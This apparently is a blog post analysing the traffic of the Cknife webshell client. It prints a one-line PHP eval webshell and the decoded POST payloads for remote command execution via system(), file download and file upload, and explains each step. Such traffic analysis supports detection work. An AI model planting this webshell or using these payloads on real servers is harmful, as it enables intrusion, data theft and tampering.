Cknife traffic analysis


0x01 Environment

The target is a one-line PHP webshell that evaluates whatever PHP code arrives in the shell parameter (GET or POST):

<?php eval($_REQUEST['shell']); ?>

0x02 Command execution

The run result is shown in the figure below.

[figure: Cknife command-execution result]

The POST data is shown in the figure below.

[figure: raw POST request]

The decoded POST data:

#shell
@eval(base64_decode($_POST[action]));

#action
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;
$p=base64_decode($_POST["z1"]);
$s=base64_decode($_POST["z2"]);
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";
$r="{$p} {$c}";
@system($r." 2>&1",$ret);
print ($ret!=0)?"ret={$ret}":"";;
echo("|<-");
die();

#z1
cmd

#z2
cd/d"C:\wamp64\www\"&whoami&echo [S]&cd&echo [E]

z2 is the whoami command after Cknife has wrapped it (a cd into the web root, with [S] and [E] markers around the output of cd) and base64-encoded it. The shell parameter evals the action code; action base64-decodes z1 (the interpreter, cmd) and z2 (the command line), checks whether the script directory starts with "/" to pick the -c (Linux) or /c (Windows) switch, combines everything into $r, and finally runs $r through system() with stderr redirected (2>&1) and prints the result, appending ret=<code> if the exit status was non-zero.

The returned result is shown in the figure below.

[figure: raw response to the command-execution request]

After Cknife formats the response the result looks like the figure: ->| and |<- are the delimiters, and the text between them is the command output.

0x03 File download

The POST data is shown in the figure below.

[figure: raw POST request]

The decoded POST data:

#shell
@eval(base64_decode($_POST[action]));

#action
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;
$F=get_magic_quotes_gpc()?base64_decode(stripslashes($_POST["z1"])):base64_decode($_POST["z1"]);
$fp=@fopen($F,"r");
if(@fgetc($fp)){
    @fclose($fp);
    @readfile($F);
}else
{
    echo("ERROR:// Can Not Read");
};
echo("|<-");
die();

#z1
C:\wamp64\www\index.php

z1 is the base64-encoded target file path. The shell parameter evals the action code; action base64-decodes z1 to get the path (after stripslashes() if magic_quotes_gpc is enabled), checks whether the file is readable by opening it and reading one character with fgetc(), and if it is, outputs its contents with readfile(); otherwise it returns ERROR:// Can Not Read. Cknife then writes the returned contents to a local file.

The returned result is shown in the figure below.

[figure: raw response to the download request]

Note that Cknife may write the whole response to the local file; in that case you need to manually remove the ->| and |<- markers and everything outside them, otherwise the saved file is malformed.

0x04 File upload

The POST data is shown in the figure below.

[figure: raw POST request]

The decoded POST data:

#shell
@eval(base64_decode($_POST[action]));

#action
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;
$f=base64_decode($_POST["z1"]);
$c=$_POST["z2"];
$c=str_replace("\r","",$c);
$c=str_replace("\n","",$c);
$buf="";
for($i=0;$i<strlen($c);$i+=2)
$buf.=urldecode("%".substr($c,$i,2));
echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;
echo("|<-");
die();

#z1
C:\wamp64\www\test.txt

#z2
this is a test

z1 is the base64-encoded target file path, and z2 is the hex-encoded contents of the local file. The shell parameter evals the action code; action base64-decodes z1 to get the target path, reads z2, strips any \r and \n, and then walks z2 two hex characters at a time in a for loop, turning each pair into a URL-encoded %xx sequence, urldecode()-ing it and appending the resulting byte to $buf. When the loop finishes, $buf holds the file contents, which are written to the target file; 1 is returned if the write succeeds and 0 if it fails.

The returned result is shown in the figure below.

[figure: raw response to the upload request]

If the content between ->| and |<- is 1, the file upload succeeded.


Origin www.cnblogs.com/somata/p/11615680.html